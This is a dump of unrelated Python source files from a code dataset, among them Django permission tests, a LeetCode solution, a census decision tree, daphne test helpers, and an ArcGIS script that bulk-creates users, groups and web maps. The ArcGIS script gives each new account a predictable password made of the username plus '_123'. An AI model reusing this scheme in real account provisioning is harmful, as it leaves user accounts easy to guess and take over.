template_name=\"permissions/empty.html\",\n post_save_redirect=reverse(\"test_view_crud\"),\n )\n\ndef test_protected_url(request):\n return HttpResponse(\"Worked\")\n\n@require_objs_permissions_for_view(\n [\"can_set_val\"],\n get_user_from_req,\n get_queryset(PermissionTestClass, 'obj_id'),\n [\"POST\"],\n)\n@require_objs_permissions_for_view(\n [\"can_read_val\"],\n get_user_from_req,\n get_queryset(PermissionTestClass, 'obj_id'),\n [\"GET\"],\n)\ndef test_view_update(request, obj_id=None):\n return create_update.update_object(\n request, PermissionTestClass,\n object_id=obj_id,\n template_name=\"permissions/empty.html\",\n post_save_redirect=reverse(\"test_view_update\",\n kwargs=dict(obj_id=obj_id)),\n )\n\ndef add_perms_view(request, permission, user, target, redirect_to=None):\n if request.method == \"POST\":\n give_permission_to(permission, target, user)\n redirect_to = redirect_to or reverse(\"test_view_crud\")\n return HttpResponseRedirect(redirect_to)\n else:\n return HttpResponse(\n\"\"\"\nDo you want to get permissions to create PermissionTestClass instances?\n
    <form method=\"post\" action=\"\">\n<input type=\"submit\" value=\"Yes\"/>\n</form>\n
    <a href=\"%s\">No</a>\n\"\"\" % reverse(\"test_view_crud\"))\n\ndef other_perms_view(request, permission, user, target, redirect_to=None):\n    if request.method == \"POST\":\n        give_permission_to(permission, target, user)\n        redirect_to = redirect_to or reverse(\"test_view_crud\")\n        return HttpResponseRedirect(redirect_to)\n    else:\n        return HttpResponse(\n\"\"\"\nDo you want to get %s permission for obj %s?\n
    <form method=\"post\" action=\"\">\n<input type=\"submit\" value=\"Yes\"/>\n</form>\n
    <a href=\"%s\">No</a>\n\"\"\" % (permission.name, target, reverse(\"test_view_crud\")))\n","sub_path":"expedient/src/python/expedient/common/permissions/tests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121292447","text":"# --------------------------------------------------------\n# redefine the number of training and test set\n# training set < 89916, test set < 9913\n# Written by Mang Ning\n# --------------------------------------------------------\n\n\nimport argparse\n\n\ndef main():\n    # choose the number of training images and test images\n    parser = argparse.ArgumentParser(description='Train a Fast R-CNN network')\n    parser.add_argument('--train', dest='train',\n                        help='number of training images',\n                        default='19695', type=int) # 3 scenarios (boardgame, diy, drink)\n    parser.add_argument('--test', dest='test',\n                        help='number of test images',\n                        default='1666', type=int) # 3 scenarios (boardgame, diy, drink)\n    args = parser.parse_args()\n    num_training = args.train\n    num_test = args.test\n\n    with open('pascal_voc_format/VOCdevkit2007_handobj_100K/VOC2007/ImageSets/Main/trainval.txt', 'r') as r:\n        lines=r.readlines()\n\n    with open('pascal_voc_format/VOCdevkit2007_handobj_100K/VOC2007/ImageSets/Main/trainval_cp.txt', 'w') as w:\n        for ind, l in enumerate(lines):\n            w.write(l)\n            if ind == (num_training-1):\n                break\n\n\n    with open('pascal_voc_format/VOCdevkit2007_handobj_100K/VOC2007/ImageSets/Main/test.txt', 'r') as r:\n        lines=r.readlines()\n\n    with open('pascal_voc_format/VOCdevkit2007_handobj_100K/VOC2007/ImageSets/Main/test_cp.txt', 'w') as w:\n        for ind, l in enumerate(lines):\n            w.write(l)\n            if ind == (num_test-1):\n                break\n\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"data/Redefine_num_trainingtest_imgs.py","file_name":"Redefine_num_trainingtest_imgs.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"380479390","text":"\"\"\"\nGiven two arrays, write a function to compute their intersection.\n\nExample 1:\n    Input: nums1 = [1,2,2,1], nums2 = [2,2]\n    Output: [2,2]\n\nExample 2:\n    Input: nums1 = [4,9,5], nums2 = [9,4,9,8,4]\n    Output: [4,9]\n\nNote:\n    Each element in the result should appear as many times as it shows in both arrays.\n    The result can be in any order.\n\nFollow up:\n    What if the given array is already sorted? How would you optimize your algorithm?\n    What if nums1's size is small compared to nums2's size? 
Which algorithm is better?\n What if elements of nums2 are stored on disk, and the memory is limited such that you cannot load all elements into the memory at once?\n\"\"\"\n\ndef intersect(nums1, nums2):\n # count and record the freq of the nums in nums1 list\n num_freq_1 = dict()\n for num in nums1:\n if num in num_freq_1:\n num_freq_1[num] += 1\n else:\n num_freq_1[num] = 1\n # count and record the freq of the nums in nums2 list\n num_freq_2 = dict()\n for num in nums2:\n if num in num_freq_2:\n num_freq_2[num] += 1\n else:\n num_freq_2[num] = 1\n # iterate one of the dict, find the num exist in both dict as key\n result = list()\n for num in num_freq_1:\n if num in num_freq_2:\n # find the minimum freq of this num in these two dicts\n if num_freq_2[num] > num_freq_1[num]:\n min = num_freq_1[num]\n else:\n min = num_freq_2[num]\n # append min number of num into the result list\n for i in range(0, min):\n result.append(num)\n return result\n\nnums1 = [1,2,2,1]\nnums2 = [2,2]\n\nnums3 = [4,9,5]\nnums4 = [9,4,9,8,4]\nprint(intersect(nums3, nums4))\n","sub_path":"LeetCode-Python/350 Intersection of Two Arrays II.py","file_name":"350 Intersection of Two Arrays II.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425461026","text":"from shutil import move\nfrom support import *\n\n\nclass TestRun(TestCase):\n def test_xzutils_anod(self):\n \"\"\"Run checker against xzutils.anod\n \"\"\"\n p = self.run_style_checker('anod', 'xzutils.anod')\n self.assertEqual(p.status, 0, p.image)\n self.assertRunOutputEmpty(p)\n\n def test_xzutils_ko_pep8_anod(self):\n \"\"\"Run checker against xzutils-ko-pep8.anod\n \"\"\"\n p = self.run_style_checker('anod', 'xzutils-ko-pep8.anod')\n self.assertNotEqual(p.status, 0, p.image)\n self.assertRunOutputEqual(p, \"\"\"\\\nxzutils-ko-pep8.anod:3:1: E302 expected 2 blank lines, found 1\n\"\"\")\n\n def test_xzutils_ko_pyflakes_anod(self):\n \"\"\"Run checker against xzutils-ko-pyflakes.anod\n \"\"\"\n p = self.run_style_checker('anod', 'xzutils-ko-pyflakes.anod')\n self.assertNotEqual(p.status, 0, p.image)\n self.assertRunOutputEqual(p, \"\"\"\\\nxzutils-ko-pyflakes.anod:1: undefined name 'spec'\n\"\"\")\n\n\nif __name__ == '__main__':\n runtests()\n","sub_path":"testsuite/tests/Q606-055__Anod/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227744563","text":"# Decision Tree Program - Census Data\n\n#Age: \n#0-29: 1 30+: 2\n\nageInput=int(input(\"Please enter age: \"))\nif ageInput<30:\n\tage=\"1\"\nelse:\n\tage=\"2\"\n\n# Marital Status\n# Options: divorced, married, never married, Separated, Widowed\nMS = input(\"Enter marital status: \")\nif (MS!=\"divorced\")and(MS!=\"married\"):\n\tMS=\"other\"\n\n# Education\n# Inputs: No HS, HS, Associate, Bachelor, Masters, Prof, Doctorate\ned=input(\"Enter education level: \")\n\n# Hours worked per week\n# 0-40: standard 41+: extra\nhoursInput=int(input(\"enter number of hours worked per week: \"))\nif hoursInput>40:\n\thours=\"extra\"\nelse:\n\thours=\"standard\"\n\t\n# Occupation: transport, tech, unknown, clerical, craft, armed forces\nOccInput=input(\"enter occupation: \")\nif (OccInput==\"tech\" or OccInput==\"unknown\"):\n\tocc=\"2\"\nelif (OccInput==\"clerical\" or OccInput==\"craft\" or OccInput==\"armed forces\"):\n\tocc=\"1\"\nelse:\n\tocc=\"0\"\n\t\n# Gender: M F\ngender = input(\"enter 
gender: \")\n\t\n\n# our classification output = income level\t\n# Initialize as unknown in case the tree doesn't cover output\nincome = \"unknown\"\n\t\nif (MS!=\"other\"): # left branch\n\tif (ed!=\"HS\" and ed!=\"no HS\"):\n\t\tif MS==\"married\":\n\t\t\tif hours==\"extra\": # applies to all branches\n\t\t\t\tincome=\"greater\"\n\t\t\telse:\n\t\t\t\tif age == \"2\":\n\t\t\t\t\tif occ == \"2\":\n\t\t\t\t\t\tincome=\"less\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tincome=\"greater\"\n\t\t\t\telse:\n\t\t\t\t\tincome=\"less\"\n\t\tif MS==\"divorced\":\n\t\t\tif hours==\"extra\": #right tree\n\t\t\t\tif (ed==\"Masters\" or ed==\"Prof\" or ed==\"Doctorate\"):\n\t\t\t\t\tif (occ ==\"1\"):\t\n\t\t\t\t\t\tincome=\"greater\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tincome=\"less\"\n\t\t\t\telse:\n\t\t\t\t\tincome=\"less\"\n\telse:\n\t\tincome=\"less\"\nelse: # right branch\t\n\tif (ed==\"HS\" or ed==\"no HS\"):\n\t\tincome=\"less\" #left branch\n\telse:\n\t\tif age==\"1\":\n\t\t\tincome=\"less\" # left branch\n\t\telse:\n\t\t\tif hours==\"standard\":# right branch here\n\t\t\t\tif (ed==\"Prof\" or ed==\"Doctorate\"):\n\t\t\t\t\tif (gender==\"M\"):\n\t\t\t\t\t\tincome=\"greater\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tincome=\"less\"\n\t\t\t\telse:\n\t\t\t\t\tincome=\"less\"\n\t\t\telse:\n\t\t\t\tif (ed==\"Masters\" or ed==\"Prof\" or ed==\"Doctorate\"):\t##finish\n\t\t\t\t\tif (occ==\"1\"):\n\t\t\t\t\t\tincome=\"greater\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tincome=\"less\"\n\t\t\t\telse:\n\t\t\t\t\tincome=\"less\"\n\t\t\t\t\t\n\t\t\t\t\n\t\n\t\n\t\n#print(str(age))\n#print(MS)\n#print(ed)\n#print(hours)\n#print(income)\n\nprint(\"\\nExpected annual income is \"+income+\" than $50,000\") \n","sub_path":"orginaltree.py","file_name":"orginaltree.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"156417275","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 23 13:05:34 2019\r\n\r\n@author: tadahaya\r\n\"\"\"\r\nimport unittest\r\nimport pandas as pd\r\nimport os\r\nimport sys\r\nimport math\r\n\r\nfrom enan.fet import FET\r\n\r\nclass SampleTest(unittest.TestCase):\r\n    CLS_VAL = 'none'\r\n\r\n    # called at test class initialization\r\n    @classmethod\r\n    def setUpClass(cls):\r\n        if sys.flags.debug:\r\n            print('> setUpClass method is called.')\r\n        cls.CLS_VAL = '> setUpClass : initialized!'\r\n        if sys.flags.debug:\r\n            print(cls.CLS_VAL)\r\n\r\n    # called when the test class ends\r\n    @classmethod\r\n    def tearDownClass(cls):\r\n        if sys.flags.debug:\r\n            print('> tearDownClass method is called.')\r\n        cls.CLS_VAL = '> tearDownClass : released!'\r\n        if sys.flags.debug:\r\n            print(cls.CLS_VAL)\r\n\r\n    # called when a test method runs\r\n    def setUp(self):\r\n        if sys.flags.debug:\r\n            print(os.linesep + '> setUp method is called.')\r\n        self.smpl = FET()\r\n\r\n    # called when a test method ends\r\n    def tearDown(self):\r\n        if sys.flags.debug:\r\n            print(os.linesep + '> tearDown method is called.')\r\n\r\n    def _df_checker(self,df):\r\n        if type(df)!=pd.core.frame.DataFrame:\r\n            return False\r\n        elif df.shape[0]==0:\r\n            return False\r\n        else:\r\n            head = df.head(1)\r\n            judge = math.isnan(head.iat[0,0])\r\n            return not judge\r\n\r\n    def _sr_checker(self,sr):\r\n        if type(sr)!=pd.core.series.Series:\r\n            return False\r\n        if sr.shape[0]==0:\r\n            return False\r\n        else:\r\n            head = sr.head(1)\r\n            judge = math.isnan(head.iat[0])\r\n            return not judge\r\n\r\n    def test_calc(self):\r\n        # prepare test patterns\r\n        test_patterns = [\r\n            (\"fdr_bh\",\"greater\",None), 
# (arg1, arg2, ..., expected result)\r\n (\"fdr_bh\",\"two-sided\",None), # (arg1, arg2, ..., expected result)\r\n (\"fdr_bh\",\"less\",None), # (arg1, arg2, ..., expected result)\r\n (\"fdr_bh\",\"greater\",3), # (arg1, arg2, ..., expected result)\r\n ]\r\n\r\n ref,obj = self.smpl.generate_test_data()\r\n self.smpl.fit(ref)\r\n\r\n ### loop for sweeping all conditions\r\n for tcorr,tmode,tfocus in test_patterns:\r\n with self.subTest(correction=tcorr,mode=tmode,focus=tfocus):\r\n self.assertTrue(self._df_checker(self.smpl.calc(data=obj,\r\n correction=tcorr,mode=tmode,focus=tfocus)))\r\n","sub_path":"tests/test_fet.py","file_name":"test_fet.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169332835","text":"from __future__ import unicode_literals\nimport six\nfrom six.moves.urllib import parse\n\nfrom asgiref.inmemory import ChannelLayer\nfrom twisted.test import proto_helpers\n\nfrom daphne.http_protocol import HTTPFactory\n\n\ndef message_for_request(method, path, params=None, headers=None, body=None):\n \"\"\"\n Constructs a HTTP request according to the given parameters, runs\n that through daphne and returns the emitted channel message.\n \"\"\"\n request = _build_request(method, path, params, headers, body)\n return _run_through_daphne(request, 'http.request')\n\n\ndef _build_request(method, path, params=None, headers=None, body=None):\n \"\"\"\n Takes request parameters and returns a byte string of a valid HTTP/1.1 request.\n\n We really shouldn't manually build a HTTP request, and instead try to capture\n what e.g. urllib or requests would do. But that is non-trivial, so meanwhile\n we hope that our request building doesn't mask any errors.\n\n This code is messy, because urllib behaves rather different between Python 2\n and 3. Readability is further obstructed by the fact that Python 3.4 doesn't\n support % formatting for bytes, so we need to concat everything.\n If we run into more issues with this, the python-future library has a backport\n of Python 3's urllib.\n\n :param method: ASCII string of HTTP method.\n :param path: unicode string of URL path.\n :param params: List of two-tuples of bytestrings, ready for consumption for\n urlencode. Encode to utf8 if necessary.\n :param headers: List of two-tuples ASCII strings of HTTP header, value.\n :param body: ASCII string of request body.\n\n ASCII string is short for a unicode string containing only ASCII characters,\n or a byte string with ASCII encoding.\n \"\"\"\n if headers is None:\n headers = []\n else:\n headers = headers[:]\n\n if six.PY3:\n quoted_path = parse.quote(path)\n if params:\n quoted_path += '?' + parse.urlencode(params)\n quoted_path = quoted_path.encode('ascii')\n else:\n quoted_path = parse.quote(path.encode('utf8'))\n if params:\n quoted_path += b'?' 
+ parse.urlencode(params)\n\n request = method.encode('ascii') + b' ' + quoted_path + b\" HTTP/1.1\\r\\n\"\n for k, v in headers:\n request += k.encode('ascii') + b': ' + v.encode('ascii') + b\"\\r\\n\"\n\n request += b'\\r\\n'\n\n if body:\n request += body.encode('ascii')\n\n return request\n\n\ndef _run_through_daphne(request, channel_name):\n \"\"\"\n Returns Daphne's channel message for a given request.\n\n This helper requires a fair bit of scaffolding and can certainly be improved,\n but it works for now.\n \"\"\"\n channel_layer = ChannelLayer()\n factory = HTTPFactory(channel_layer)\n proto = factory.buildProtocol(('127.0.0.1', 0))\n tr = proto_helpers.StringTransport()\n proto.makeConnection(tr)\n proto.dataReceived(request)\n _, message = channel_layer.receive([channel_name])\n return message\n\n\ndef content_length_header(body):\n \"\"\"\n Returns an appropriate Content-Length HTTP header for a given body.\n \"\"\"\n return 'Content-Length', six.text_type(len(body))\n","sub_path":"daphne/tests/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":3187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353254042","text":"#!/usr/local/pyenv/shims/python3.6\n# coding: utf-8\n\nimport os\nimport argparse\nfrom watch import watch\n\nparser = argparse.ArgumentParser(description='Texファイルのオートコンパイル')\nparser.add_argument('-cf', '--config_file', help=\"Configファイルの位置\", default=os.getcwd() + \"/\" + \"latex_auto_compile.conf\")\nparser.add_argument('-w', '--print_warning', help=\"Warningを表示する\", action='store_true')\nparser.add_argument('-t', '--typeset_once', help=\"1回だけタイプセットする\", action='store_true')\nparser.add_argument('-p', '--update_picture', help=\"画像の更新だけする\", action='store_true')\nparser.add_argument('-tp', '--typeset_picture', help=\"1回だけタイプセットする(画像の更新も行う)\", action='store_true')\nparser.add_argument('-rtf', '--rtf', help=\"RTF形式に変換する\", action='store_true')\n\nargs = parser.parse_args()\nwatch = watch.WATCH(args)\nprint(watch.settings)\nif args.rtf is True:\n watch.generate_rtf()\n exit()\nif args.typeset_once is True or args.update_picture is True or args.typeset_picture is True:\n if args.update_picture is True or args.typeset_picture is True:\n watch.update_pdf()\n if args.typeset_once is True or args.typeset_picture is True:\n watch.typeset_once()\nelse:\n watch.watch()\n","sub_path":"latex_auto_compile.py","file_name":"latex_auto_compile.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"147103935","text":"import numpy as np\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\r\nfrom sklearn import preprocessing\r\n\r\nclass abt_lda:\r\n def __init__(self, x, n_components, preprocess=True):\r\n self.x = x\r\n self.preprocess = preprocess\r\n self.n_components = n_components\r\n\r\n if self.preprocess:\r\n self.Xscaler = preprocessing.StandardScaler().fit(self.x)\r\n self.x = self.Xscaler.transform(self.x)\r\n\r\n def construct_lda_model(self):\r\n self.lda = LinearDiscriminantAnalysis(self.n_components)\r\n self.lda.fit(self.x)\r\n\r\n def extract_lda_feature(self, x_test):\r\n if self.preprocess:\r\n x_test = self.Xscaler.transform(x_test)\r\n return self.lda.transform(x_test)\r\n\r\n def extract_lda_ratio(self):\r\n\r\n a = self.lda.explained_variance_ratio_\r\n\r\n return 
a\r\n","sub_path":"space_projection_models/abtlda.py","file_name":"abtlda.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457698414","text":"from arcgis.mapping import WebMap\nfrom arcgis.gis import GIS\n\nimport datetime\nimport logging\nimport time\nimport json\nimport time\nimport csv\nimport os\n\n\ndef get_config(in_file):\n\n with open(in_file) as config:\n param_dict = json.load(config)\n\n return param_dict\n\n\ndef get_logger(t_dir, s_time):\n\n log = logging.getLogger(__name__)\n log.setLevel(logging.DEBUG)\n\n # Set Logger Time\n logger_date = datetime.datetime.fromtimestamp(s_time).strftime('%Y_%m_%d')\n logger_time = datetime.datetime.fromtimestamp(s_time).strftime('%H_%M_%S')\n\n # Debug Handler for Console Checks - logger.debug(msg)\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n log.addHandler(console_handler)\n\n # Ensure Logs Directory Exists\n l_dir = os.path.join(t_dir, 'logs', logger_date)\n if not os.path.exists(l_dir):\n os.makedirs(l_dir)\n\n # Log Handler for Reports - logger.info(msg)\n log_handler = logging.FileHandler(os.path.join(l_dir, 'Report_{}.txt'.format(logger_date)), 'w')\n log_handler.setLevel(logging.INFO)\n log.addHandler(log_handler)\n\n log.info('Script Started: {} - {}\\n'.format(logger_date, logger_time))\n\n return log, l_dir\n\n\ndef create_groups(gis, group):\n\n logger.info('-' * 25)\n logger.info('Creating Groups')\n logger.info('-' * 25)\n\n # Error Set - Capture Fails & Return For CSV Output\n grp_err_set = []\n\n with open(group['csv'], newline='') as the_file:\n\n the_reader = csv.reader(the_file, delimiter=',')\n\n # Skip Header Row\n next(the_reader)\n\n # Build Group For Each Input Row\n for idx, row in enumerate(the_reader):\n\n # Ignore Rows With Missing values\n if len(row) != 3:\n logger.debug('Group Input Row {} Is Invalid'.format(idx))\n logger.debug('Row Values: {}'.format(row))\n continue\n\n else:\n try:\n # Unpack Expected Values & Create Group\n access = group['access']\n title = row[0]\n tags = ','.join(group['tags'] + [row[1]])\n bio = row[2]\n\n new_group = gis.groups.create(\n description=bio,\n access=access,\n title=title,\n tags=tags\n )\n logger.info('Created Group: {}'.format(new_group.title))\n\n except RuntimeError as run_err:\n logger.info('RuntimeError While Creating Group: {}'.format(run_err))\n grp_err_set.append(row)\n\n except Exception as gen_exc:\n logger.info('General Error While Creating Group: {}'.format(gen_exc))\n grp_err_set.append(row)\n\n logger.info('Groups That Could Not Be Created: {}'.format(len(grp_err_set)))\n return grp_err_set\n\n\ndef create_users(gis, user):\n\n logger.info('-' * 25)\n logger.info('Creating Users')\n logger.info('-' * 25)\n\n # Error Set - Capture Fails & Return For CSV Output\n usr_err_set = []\n\n with open(user['csv'], newline='') as the_file:\n\n the_reader = csv.reader(the_file, delimiter=',')\n\n # Skip Header Row\n next(the_reader)\n\n # Build Group For Each Input Row\n for idx, row in enumerate(the_reader):\n\n # Ignore Rows With Missing values\n if len(row) != 5:\n logger.debug('User Input Row {} Is Invalid'.format(idx))\n logger.debug('Row Values: {}'.format(row))\n continue\n\n else:\n try:\n firstname = row[0]\n lastname = row[1]\n email = row[2]\n bio = row[4]\n role = user['role']\n username = '_'.join([firstname, lastname])\n password = '{}_123'.format(username)\n\n new_user = gis.users.create(\n firstname=firstname,\n 
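# credentials derived above: username is firstname_lastname and password is username_123\n                        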
lastname=lastname,\n username=username,\n password=password,\n description=bio,\n email=email,\n role=role\n )\n logger.info('Created User: {}'.format(new_user.username))\n\n # Fetch Configured Group\n target_group = fetch_target_group(gis, row[3])\n\n # Assign User to Group\n if not target_group:\n logger.info('Could Not Assign User {} to Group'.format(username))\n else:\n user_add = target_group.add_users([username])\n logger.debug('Group Addition: {}'.format(user_add))\n\n except RuntimeError as run_err:\n logger.info('RuntimeError While Creating User: {}'.format(run_err))\n usr_err_set.append(row)\n\n except Exception as gen_exc:\n logger.info('General Error While Creating Group: {}'.format(gen_exc))\n usr_err_set.append(row)\n\n logger.info('Users That Could Not Be Created: {}'.format(len(usr_err_set)))\n return usr_err_set\n\n\ndef fetch_target_group(gis, search_group):\n\n # Get Set of Potential Group Objects\n the_set = gis.groups.search('{}'.format(search_group), max_groups=25)\n\n # Check Set for Matches\n for grp in the_set:\n if grp.title == search_group:\n return grp\n\n # Flag for Logging\n return None\n\n\ndef fetch_all_groups(gis, match_case):\n\n # Search Groups Matching Input Case\n the_set = gis.groups.search('{}*'.format(match_case), max_groups=5000)\n\n # Return List of Group Names\n return [grp.title for grp in the_set]\n\n\ndef fetch_target_map(gis, map_title):\n\n map_set = gis.content.search('{}'.format(map_title))\n\n for m in map_set:\n if m.title == map_title:\n return map_set\n\n return None\n\n\ndef update_web_map(gis, map_item, map_props):\n\n pass\n\n # time.sleep(5)\n\n # web_map_set = gis.content.search('{}'.format(map_item.title))\n # logger.debug(web_map_set)\n\n # wm = WebMap(gis.content.search('{}'.format(map_item.title))[0])\n # wm['operationalLayers'] = map_props['base_urls']\n # save_res = wm.save(item_properties={})\n # logger.debug(save_res)\n\n\ndef create_web_maps(gis, group_set, web_map):\n\n logger.info('-' * 25)\n logger.info('Creating Web Maps')\n logger.info('-' * 25)\n\n for grp_title in group_set:\n\n try:\n title = '{} - {}'.format(web_map['title'], grp_title)\n snippet = web_map['snippet']\n tags = web_map['tags']\n\n # Skip Existing Web Maps\n map_exists = fetch_target_map(gis, title)\n if map_exists:\n logger.info('Web Map Already Exists: {}'.format(title))\n continue\n\n map_item = WebMap().save({\n 'title': title,\n 'snippet': snippet,\n 'tags': tags\n })\n logger.debug(map_item)\n logger.debug(map_item.title)\n\n update_web_map(gis, map_item, web_map)\n\n # Share New Item With Target Group\n share_res = map_item.share(groups=[grp_title])\n\n # Ensure Response Object Has Expected Key\n if not share_res.get('notSharedWith', None):\n logger.info('Issue Creating Web Map')\n continue\n\n # Ensure Web Map Shared Properly\n if len(share_res['notSharedWith']) != 1:\n logger.info('Issue Sharinng Web Map')\n\n except Exception as gen_exc:\n logger.info('General Exception While Creating Web Maps: {}'.format(gen_exc))\n\n\nif __name__ == \"__main__\":\n\n # Get Start Time\n start_time = time.time()\n\n # Get Script Directory\n this_dir = os.path.split(os.path.realpath(__file__))[0]\n\n # Get Logger & Log Directory\n logger, log_dir = get_logger(this_dir, start_time)\n\n # Collect Configured Parameters\n parameters = get_config(os.path.join(this_dir, 'config.json'))\n web_map = parameters['web_map']\n portal = parameters['portal']\n group = parameters['group']\n user = parameters['user']\n\n # Get GIS Connection\n gis = GIS(portal['path'], 
portal['user'], portal['pass'])\n logger.debug('Connected: {}\\n'.format(gis))\n\n # # Create Groups\n # group_error_set = create_groups(gis, group)\n #\n # # Create Users & Assign to Groups\n # user_error_set = create_users(gis, user)\n\n # Collect All Existing Contractor Groups\n group_set = fetch_all_groups(gis, 'Contractor')\n\n # Handle Web Map Generation & Assign to Group\n create_web_maps(gis, group_set, web_map)\n\n # Log Run Time\n logger.info('\\nProgram Run Time: {0} Minutes'.format(round(((time.time() - start_time) / 60), 2)))\n","sub_path":"usr_grp_runner.py","file_name":"usr_grp_runner.py","file_ext":"py","file_size_in_byte":9008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193199891","text":"from collections import defaultdict\nfrom collections import OrderedDict\nfrom IPython import embed\nfrom tqdm import tqdm\nimport torch\nimport numpy as np\nfrom data import *\nfrom itertools import chain\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import precision_recall_fscore_support\nimport fasttext\n\nclass Pos:\n def __init__(self):\n self.word = 0\n self.label = 3\n self.pos = 4\n\nclass Features:\n def __init__(self):\n self.emb_path = '../../../embedding/glove.6B.100d.txt'\n self.corpus_dir = '../../Data/formatted/'\n self.corpus_pkl = \"./corpus.io.pkl\"\n self.encoder_pkl = \"./encoder.io.pkl\"\n self.corpus = Corpus.get_corpus(self.corpus_dir, self.corpus_pkl)\n self.encoder = Encoder.get_encoder(self.corpus, self.emb_path, self.encoder_pkl)\n # self.model = fasttext.load_model(\"result/fil9.bin\")\n self.model = None\n\n def word_pos(self,tag, pos_tags):\n pos_emb = []\n for pos in pos_tags:\n if tag == pos:\n pos_emb.append(1)\n else:\n pos_emb.append(0)\n return pos_emb\n\n def word_emb(self,word,glove_emb=True):\n if glove_emb:\n emb = self.encoder.word_emb[self.encoder.word2index[word]]\n else:\n emb = self.model.get_word_vector(word)\n return emb\n\n def generate_features(self,filename, pos_tags = None,prev_count=1,next_count=1,glove_emb=True):\n pos_obj = Pos()\n ip_file = filename\n X_split, y_split = [], []\n keylist = []\n word_dict = defaultdict(list) #key:sentence_word_id; value:[\"word\",pos_tag,predicted_label]\n\n with open(ip_file, 'r') as fp:\n lines = [line.split() for line in fp]\n\n #generate list of unique pos-tags\n if pos_tags is None:\n pos_tags = []\n for i in lines:\n if i:\n pos_tags.append(i[4])\n\n pos_tags = list(set(pos_tags))\n\n #generate feature dict\n #outer-counter handles lines, inner-counter handles each word in line\n outer_counter = 0\n for sentence in lines:\n if not sentence: #handles blank lines; separator between different sentences\n inner_counter = 1\n outer_counter+=1\n else:\n word_id = str(outer_counter)+\"_\"+str(inner_counter)\n word = sentence[pos_obj.word]\n pos = sentence[pos_obj.pos]\n y = sentence[pos_obj.label]\n keylist.append(word_id)\n word_dict[word_id].append(word)\n word_dict[word_id].append(pos)\n word_dict[word_id].append(y)\n inner_counter+=1\n key_indices = list(enumerate(word_dict))\n # current_key = key_indices[0][1]\n sentence_features = defaultdict(list)\n sentence_probs = defaultdict(list)\n for index,key in tqdm(key_indices):\n outer, inner = key.split(\"_\")\n #prev pos embedding\n # prev_pos_emb = [0] * len(pos_tags) * prev_count\n if inner==\"1\": #handles first word with no-prev embedding\n prev_pos_emb = [0] * len(pos_tags) * prev_count\n\n else:\n prev_pos_emb = []\n 
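# walk back prev_count tokens and append each one-hot POS vector, zero-padding when the window runs past the first token\n                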
for i in range(prev_count+1):\n if i!=0 and index-i >=0:\n prev_pos = word_dict[keylist[index-i]][1]\n prev_pos_emb.extend(self.word_pos(prev_pos, pos_tags))\n elif index-i<0:\n prev_pos_emb.extend([0]*len(pos_tags))\n\n\n #current pos embedding\n cur_pos = word_dict[key][1]\n cur_pos_emb = self.word_pos(cur_pos, pos_tags)\n\n\n #next pos embedding\n next_outer = str(int(outer)+1)+\"_1\"\n try:\n next_pos_emb=[]\n for i in range(next_count+1):\n if next_outer == keylist[index+i] or next_outer.split(\"_\")[0] == keylist[index+i].split(\"_\")[0]:\n next_pos_emb = [0] * len(pos_tags) * next_count\n elif i!=0:\n # next_pos_emb = []\n next_pos = word_dict[keylist[index+i]][1]\n next_pos_emb.extend(self.word_pos(next_pos, pos_tags))\n except:\n next_pos_emb = [0] * len(pos_tags) * next_count\n\n # get word-embedding for particular word\n word_vector = list(self.word_emb(word_dict[key][0],glove_emb))\n f_prev,f_cur,f_next = len(prev_pos_emb), len(cur_pos_emb),len(next_pos_emb)\n #X_train\n feature_vector = word_vector+prev_pos_emb+cur_pos_emb+next_pos_emb\n\n X_split.append(feature_vector)\n sentence_features[outer].append(feature_vector)\n\n #y-values\n true_y = 1 if float(word_dict[key][2]) >= 0.5 else 0\n sentence_probs[outer].append(float(word_dict[key][2]))\n\n #y-train\n y_split.append(true_y)\n return X_split, y_split, [sentence_features, sentence_probs, word_dict], pos_tags\n\n def predict_score(self,predicted_scores,true_label):\n match_m_score = match_M(predicted_scores,true_label)\n top_k_score = topK(predicted_scores,true_label)\n return match_m_score, top_k_score","sub_path":"logistic/Code/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249076237","text":"import numpy as np\n\nfrom ... 
